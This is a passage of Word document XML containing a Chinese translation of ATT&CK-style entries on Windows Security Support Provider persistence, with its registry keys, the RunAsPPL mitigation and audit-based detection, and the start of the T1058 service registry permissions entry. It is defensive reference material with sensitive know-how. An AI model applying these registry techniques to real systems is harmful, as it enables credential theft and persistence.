            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，已加载动态链接库</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3954BE4D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6783627E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36665D69" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全支持提供程序）动态链接库在系统启动时加载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（本地安全机构）进程中。一旦加载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库可以访问存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的加密和明文密码，例如任何登录用户的域密码或智能卡</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置存储在两个注册表项中：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者可能会修改这些注册表项来添加新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将在下次系统启动时加载，或者在调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AddSecurityPackage Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数时加载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101A4343" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6906"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00683C05" w14:paraId="164E0B80" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5A932B11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00683C05" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00683C05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5AE82130" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00683C05" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00683C05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="708155B4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B1BF7E7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B0240EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows 8.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows Server 2012 R2</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和更高版本中</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以通过设置注册表项</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>LSA</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>作为P</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>PL</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Protected Process Light</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）运行，这需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>微软</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对所有</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSP</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态链接库</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行签名。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CC1CE88" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221CFFDD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D908D90" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控注册表来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表项是否有更改。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有动态链接库加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 8.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Server 2012 R2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在注册表项</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AuditLevel = 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未签名的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时会生成事件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D93A3B5" w14:textId="23F45278" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E782E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务注册权限</w:t>
      </w:r>
      <w:r w:rsidR="00135C9C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺陷</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="3AADF4CD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63FC1AC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve"> T1058</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599C8E86" w14:textId="52DB954E" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66148E08" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D99C390" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>能够修改注册表中的服务值</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF0526A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="749683F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>有效权限</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D50DA24" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数，服务，</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CD8167" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId74" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="000D3349">
                <w:t>CAPEC-203</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="33EA1C98" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000D3349" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t>: Matthew Demaske, Adaptforward; Travis Smith, Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3757B455" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000D3349">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3349">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E9520BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1591FA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F311F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在注册表中存储本地服务配置</w:t>
      </w:r>
      <w:r w:rsidRPr="000F311F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。存储在服务的注册表项下的信息可以通过服务控制器、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
